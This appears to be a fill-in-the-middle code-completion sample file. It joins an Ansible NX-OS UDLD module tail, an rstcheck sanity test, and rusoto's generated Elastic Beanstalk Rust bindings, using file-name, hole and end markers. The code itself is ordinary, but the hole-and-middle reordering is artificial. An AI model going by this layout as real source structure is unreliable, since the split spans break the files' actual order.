execute_show(cmds, module) body = get_cli_body_ssh(command, response, module) elif module.params['transport'] == 'nxapi': cmds = [command] body = execute_show(cmds, module, command_type=command_type) return body def flatten_list(command_lists): flat_command_list = [] for command in command_lists: if isinstance(command, list): flat_command_list.extend(command) else: flat_command_list.append(command) return flat_command_list def get_udld_interface(module, interface): command = 'show udld {0}'.format(interface) interface_udld = {} mode = None try: body = execute_show_command(command, module)[0] table = body['TABLE_interface']['ROW_interface'] status = str(table.get('mib-port-status', None)) # Note: 'mib-aggresive-mode' is NOT a typo agg = str(table.get('mib-aggresive-mode', 'disabled')) if agg == 'enabled': mode = 'aggressive' else: mode = status interface_udld['mode'] = mode except (KeyError, AttributeError, IndexError): interface_udld = {} return interface_udld def is_interface_copper(module, interface): command = 'show interface status' copper = [] try: body = execute_show_command(command, module)[0] table = body['TABLE_interface']['ROW_interface'] for each in table: itype = each.get('type', 'DNE') if 'CU' in itype or '1000' in itype or '10GBaseT' in itype: copper.append(str(each['interface'].lower())) except (KeyError, AttributeError): pass if interface in copper: found = True else: found = False return found def get_commands_config_udld_interface(delta, interface, module, existing): commands = [] copper = is_interface_copper(module, interface) if delta: mode = delta['mode'] if mode == 'aggressive': command = 'udld aggressive' elif copper: if mode == 'enabled': if existing['mode'] == 'aggressive': command = 'no udld aggressive ; udld enable' else: command = 'udld enable' elif mode == 'disabled': command = 'no udld enable' elif not copper: if mode == 'enabled': if existing['mode'] == 'aggressive': command = 'no udld aggressive ; no udld disable' else: command = 'no udld disable' elif mode == 'disabled': command = 'udld disable' if command: commands.append(command) commands.insert(0, 'interface {0}'.format(interface)) return commands def get_commands_remove_udld_interface(delta, interface, module, existing): commands = [] copper = is_interface_copper(module, interface) if delta: mode = delta['mode'] if mode == 'aggressive': command = 'no udld aggressive' elif copper: if mode == 'enabled': command = 'no udld enable' elif mode == 'disabled': command = 'udld enable' elif not copper: if mode == 'enabled': command = 'udld disable' elif mode == 'disabled': command = 'no udld disable' if command: commands.append(command) commands.insert(0, 'interface {0}'.format(interface)) return commands def main(): argument_spec = dict( mode=dict(choices=['enabled', 'disabled', 'aggressive'], required=True), interface=dict(type='str', required=True), state=dict(choices=['absent', 'present'], default='present'), ) module = get_network_module(argument_spec=argument_spec, supports_check_mode=True) interface = module.params['interface'].lower() mode = module.params['mode'] state = module.params['state'] proposed = dict(mode=mode) existing = get_udld_interface(module, interface) end_state = existing delta = dict(set(proposed.iteritems()).difference(existing.iteritems())) changed = False commands = [] if state == 'present': if delta: command = get_commands_config_udld_interface(delta, interface, module, existing) commands.append(command) elif state == 'absent': common = set(proposed.iteritems()).intersection(existing.iteritems()) if common: command = get_commands_remove_udld_interface( dict(common), interface, module, existing ) commands.append(command) cmds = flatten_list(commands) if cmds: if module.check_mode: module.exit_json(changed=True, commands=cmds) else: changed = True execute_config_command(cmds, module) end_state = get_udld_interface(module, interface) if 'configure' in cmds: cmds.pop(0) results = {} results['proposed'] = proposed results['existing'] = existing results['end_state'] = end_state results['updates'] = cmds results['changed'] = changed module.exit_json(**results) if __name__ == '__main__': main()<|fim▁end|>
interface: Ethernet1/1 mode: enabled
<|file_name|>rstcheck.py<|end_file_name|><|fim▁begin|>"""Sanity test using rstcheck.""" from __future__ import absolute_import, print_function import os from lib.sanity import ( SanitySingleVersion, SanityMessage, SanityFailure, SanitySuccess, SanitySkipped, ) from lib.util import ( SubprocessError, run_command, parse_to_dict, find_executable, ) from lib.config import ( SanityConfig, ) class RstcheckTest(SanitySingleVersion): """Sanity test using rstcheck.""" def test(self, args, targets): """ :type args: SanityConfig :type targets: SanityTargets :rtype: SanityResult """ with open('test/sanity/rstcheck/ignore-substitutions.txt', 'r') as ignore_fd: ignore_substitutions = sorted(set(ignore_fd.read().splitlines())) paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] in ('.rst',)) if not paths: return SanitySkipped(self.name) cmd = [ 'python%s' % args.python_version, find_executable('rstcheck'), '--report', 'warning', '--ignore-substitutions', ','.join(ignore_substitutions), ] + paths try: stdout, stderr = run_command(args, cmd, capture=True) status = 0 except SubprocessError as ex: stdout = ex.stdout stderr = ex.stderr status = ex.status if stdout: raise SubprocessError(cmd=cmd, status=status, stderr=stderr, stdout=stdout) if args.explain: return SanitySuccess(self.name) pattern = r'^(?P<path>[^:]*):(?P<line>[0-9]+): \((?P<level>INFO|WARNING|ERROR|SEVERE)/[0-4]\) (?P<message>.*)$' results = [parse_to_dict(pattern, line) for line in stderr.splitlines()] results = [SanityMessage( message=r['message'], path=r['path'],<|fim▁hole|> level=r['level'], ) for r in results] if results: return SanityFailure(self.name, messages=results) return SanitySuccess(self.name)<|fim▁end|>
line=int(r['line']), column=0,
<|file_name|>generated.rs<|end_file_name|><|fim▁begin|>#[allow(warnings)] use hyper::Client; use hyper::status::StatusCode; use rusoto_core::request::DispatchSignedRequest; use rusoto_core::region; use std::fmt; use std::error::Error; use rusoto_core::request::HttpDispatchError; use rusoto_core::credential::{CredentialsError, ProvideAwsCredentials}; use std::str::FromStr; use xml::EventReader; use xml::reader::ParserConfig; use rusoto_core::param::{Params, ServiceParams}; use rusoto_core::signature::SignedRequest; use xml::reader::XmlEvent; use rusoto_core::xmlutil::{Next, Peek, XmlParseError, XmlResponse}; use rusoto_core::xmlutil::{characters, end_element, start_element, skip_tree, peek_at_name}; use rusoto_core::xmlerror::*; enum DeserializerNext { Close, Skip, Element(String), } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct AbortEnvironmentUpdateMessage { #[doc="<p>This specifies the ID of the environment with the in-progress update that you want to cancel.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>This specifies the name of the environment with the in-progress update that you want to cancel.</p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `AbortEnvironmentUpdateMessage` contents to a `SignedRequest`. struct AbortEnvironmentUpdateMessageSerializer; impl AbortEnvironmentUpdateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &AbortEnvironmentUpdateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } pub type AbortableOperationInProgress = bool; struct AbortableOperationInProgressDeserializer; impl AbortableOperationInProgressDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AbortableOperationInProgress, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionHistoryStatus = String; struct ActionHistoryStatusDeserializer; impl ActionHistoryStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionHistoryStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionStatus = String; struct ActionStatusDeserializer; impl ActionStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionType = String; struct ActionTypeDeserializer; impl ActionTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an application.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescription { #[doc="<p>The name of the application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The names of the configuration templates associated with this application.</p>"] pub configuration_templates: Option<ConfigurationTemplateNamesList>, #[doc="<p>The date when the application was created.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The date when the application was last modified.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>User-defined description of the application.</p>"] pub description: Option<Description>, #[doc="<p>The lifecycle settings for the application.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, #[doc="<p>The names of the versions for this application.</p>"] pub versions: Option<VersionLabelsList>, } struct ApplicationDescriptionDeserializer; impl ApplicationDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "ConfigurationTemplates" => { obj.configuration_templates = Some(try!(ConfigurationTemplateNamesListDeserializer::deserialize("ConfigurationTemplates", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "ResourceLifecycleConfig" => { obj.resource_lifecycle_config = Some(try!(ApplicationResourceLifecycleConfigDeserializer::deserialize("ResourceLifecycleConfig", stack))); } "Versions" => { obj.versions = Some(try!(VersionLabelsListDeserializer::deserialize("Versions", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationDescriptionList = Vec<ApplicationDescription>; struct ApplicationDescriptionListDeserializer; impl ApplicationDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ApplicationDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message containing a single description of an application.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescriptionMessage { #[doc="<p> The <a>ApplicationDescription</a> of the application. </p>"] pub application: Option<ApplicationDescription>, } struct ApplicationDescriptionMessageDeserializer; impl ApplicationDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Application" => { obj.application = Some(try!(ApplicationDescriptionDeserializer::deserialize("Application", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message containing a list of application descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescriptionsMessage { #[doc="<p>This parameter contains a list of <a>ApplicationDescription</a>.</p>"] pub applications: Option<ApplicationDescriptionList>, } struct ApplicationDescriptionsMessageDeserializer; impl ApplicationDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Applications" => { obj.applications = Some(try!(ApplicationDescriptionListDeserializer::deserialize("Applications", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Application request metrics for an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationMetrics { #[doc="<p>The amount of time that the metrics cover (usually 10 seconds). For example, you might have 5 requests (<code>request_count</code>) within the most recent time slice of 10 seconds (<code>duration</code>).</p>"] pub duration: Option<NullableInteger>, #[doc="<p>Represents the average latency for the slowest X percent of requests over the last 10 seconds. Latencies are in seconds with one milisecond resolution.</p>"] pub latency: Option<Latency>, #[doc="<p>Average number of requests handled by the web server per second over the last 10 seconds.</p>"] pub request_count: Option<RequestCount>, #[doc="<p>Represents the percentage of requests over the last 10 seconds that resulted in each type of status code response.</p>"] pub status_codes: Option<StatusCodes>, } struct ApplicationMetricsDeserializer; impl ApplicationMetricsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationMetrics, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationMetrics::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Duration" => { obj.duration = Some(try!(NullableIntegerDeserializer::deserialize("Duration", stack))); } "Latency" => { obj.latency = Some(try!(LatencyDeserializer::deserialize("Latency", stack))); } "RequestCount" => { obj.request_count = Some(try!(RequestCountDeserializer::deserialize("RequestCount", stack))); } "StatusCodes" => { obj.status_codes = Some(try!(StatusCodesDeserializer::deserialize("StatusCodes", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationName = String; struct ApplicationNameDeserializer; impl ApplicationNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationNamesList = Vec<ApplicationName>; /// Serialize `ApplicationNamesList` contents to a `SignedRequest`. struct ApplicationNamesListSerializer; impl ApplicationNamesListSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationNamesList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>The resource lifecycle configuration for an application. Defines lifecycle settings for resources that belong to the application, and the service role that Elastic Beanstalk assumes in order to apply lifecycle settings. The version lifecycle configuration defines lifecycle settings for application versions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationResourceLifecycleConfig { #[doc="<p>The ARN of an IAM service role that Elastic Beanstalk has permission to assume.</p>"] pub service_role: Option<String>, #[doc="<p>The application version lifecycle configuration.</p>"] pub version_lifecycle_config: Option<ApplicationVersionLifecycleConfig>, } struct ApplicationResourceLifecycleConfigDeserializer; impl ApplicationResourceLifecycleConfigDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationResourceLifecycleConfig, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationResourceLifecycleConfig::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ServiceRole" => { obj.service_role = Some(try!(StringDeserializer::deserialize("ServiceRole", stack))); } "VersionLifecycleConfig" => { obj.version_lifecycle_config = Some(try!(ApplicationVersionLifecycleConfigDeserializer::deserialize("VersionLifecycleConfig", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ApplicationResourceLifecycleConfig` contents to a `SignedRequest`. struct ApplicationResourceLifecycleConfigSerializer; impl ApplicationResourceLifecycleConfigSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationResourceLifecycleConfig) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.service_role { params.put(&format!("{}{}", prefix, "ServiceRole"), &field_value); } if let Some(ref field_value) = obj.version_lifecycle_config { ApplicationVersionLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "VersionLifecycleConfig"), field_value, ); } } } #[derive(Default,Debug,Clone)] pub struct ApplicationResourceLifecycleDescriptionMessage { #[doc="<p>The name of the application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The lifecycle configuration.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, } struct ApplicationResourceLifecycleDescriptionMessageDeserializer; impl ApplicationResourceLifecycleDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationResourceLifecycleDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationResourceLifecycleDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "ResourceLifecycleConfig" => { obj.resource_lifecycle_config = Some(try!(ApplicationResourceLifecycleConfigDeserializer::deserialize("ResourceLifecycleConfig", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescription { #[doc="<p>The name of the application to which the application version belongs.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>Reference to the artifact from the AWS CodeBuild build.</p>"] pub build_arn: Option<String>, #[doc="<p>The creation date of the application version.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The last modified date of the application version.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>The description of the application version.</p>"] pub description: Option<Description>, #[doc="<p>If the version's source code was retrieved from AWS CodeCommit, the location of the source code for the application version.</p>"] pub source_build_information: Option<SourceBuildInformation>, #[doc="<p>The storage location of the application version's source bundle in Amazon S3.</p>"] pub source_bundle: Option<S3Location>, #[doc="<p>The processing status of the application version.</p>"] pub status: Option<ApplicationVersionStatus>, #[doc="<p>A unique identifier for the application version.</p>"] pub version_label: Option<VersionLabel>, } struct ApplicationVersionDescriptionDeserializer; impl ApplicationVersionDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "BuildArn" => { obj.build_arn = Some(try!(StringDeserializer::deserialize("BuildArn", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "SourceBuildInformation" => { obj.source_build_information = Some(try!(SourceBuildInformationDeserializer::deserialize("SourceBuildInformation", stack))); } "SourceBundle" => { obj.source_bundle = Some(try!(S3LocationDeserializer::deserialize("SourceBundle", stack))); } "Status" => { obj.status = Some(try!(ApplicationVersionStatusDeserializer::deserialize("Status", stack))); } "VersionLabel" => { obj.version_label = Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationVersionDescriptionList = Vec<ApplicationVersionDescription>; struct ApplicationVersionDescriptionListDeserializer; impl ApplicationVersionDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ApplicationVersionDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message wrapping a single description of an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescriptionMessage { #[doc="<p> The <a>ApplicationVersionDescription</a> of the application version. </p>"] pub application_version: Option<ApplicationVersionDescription>, } struct ApplicationVersionDescriptionMessageDeserializer; impl ApplicationVersionDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationVersion" => { obj.application_version = Some(try!(ApplicationVersionDescriptionDeserializer::deserialize("ApplicationVersion", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message wrapping a list of application version descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescriptionsMessage { #[doc="<p>List of <code>ApplicationVersionDescription</code> objects sorted in order of creation.</p>"] pub application_versions: Option<ApplicationVersionDescriptionList>, #[doc="<p>For a paginated request, the token that you can pass in a subsequent request to get the next page.</p>"] pub next_token: Option<Token>, } struct ApplicationVersionDescriptionsMessageDeserializer; impl ApplicationVersionDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationVersions" => { obj.application_versions = Some(try!(ApplicationVersionDescriptionListDeserializer::deserialize("ApplicationVersions", stack))); } "NextToken" => { obj.next_token = Some(try!(TokenDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The application version lifecycle settings for an application. Defines the rules that Elastic Beanstalk applies to an application's versions in order to avoid hitting the per-region limit for application versions.</p> <p>When Elastic Beanstalk deletes an application version from its database, you can no longer deploy that version to an environment. The source bundle remains in S3 unless you configure the rule to delete it.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionLifecycleConfig { #[doc="<p>Specify a max age rule to restrict the length of time that application versions are retained for an application.</p>"] pub max_age_rule: Option<MaxAgeRule>, #[doc="<p>Specify a max count rule to restrict the number of application versions that are retained for an application.</p>"] pub max_count_rule: Option<MaxCountRule>, } struct ApplicationVersionLifecycleConfigDeserializer; impl ApplicationVersionLifecycleConfigDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionLifecycleConfig, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionLifecycleConfig::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "MaxAgeRule" => { obj.max_age_rule = Some(try!(MaxAgeRuleDeserializer::deserialize("MaxAgeRule", stack))); } "MaxCountRule" => { obj.max_count_rule = Some(try!(MaxCountRuleDeserializer::deserialize("MaxCountRule", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ApplicationVersionLifecycleConfig` contents to a `SignedRequest`. struct ApplicationVersionLifecycleConfigSerializer; impl ApplicationVersionLifecycleConfigSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationVersionLifecycleConfig) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.max_age_rule { MaxAgeRuleSerializer::serialize( params, &format!("{}{}", prefix, "MaxAgeRule"), field_value, ); } if let Some(ref field_value) = obj.max_count_rule { MaxCountRuleSerializer::serialize( params, &format!("{}{}", prefix, "MaxCountRule"), field_value, ); } } } pub type ApplicationVersionProccess = bool; pub type ApplicationVersionStatus = String; struct ApplicationVersionStatusDeserializer; impl ApplicationVersionStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to execute a scheduled managed action immediately.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplyEnvironmentManagedActionRequest { #[doc="<p>The action ID of the scheduled managed action to execute.</p>"] pub action_id: String, #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<String>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<String>, } /// Serialize `ApplyEnvironmentManagedActionRequest` contents to a `SignedRequest`. struct ApplyEnvironmentManagedActionRequestSerializer; impl ApplyEnvironmentManagedActionRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplyEnvironmentManagedActionRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ActionId"), &obj.action_id); if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>The result message containing information about the managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplyEnvironmentManagedActionResult { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>The action ID of the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The status of the managed action.</p>"] pub status: Option<String>, } struct ApplyEnvironmentManagedActionResultDeserializer; impl ApplyEnvironmentManagedActionResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplyEnvironmentManagedActionResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplyEnvironmentManagedActionResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = 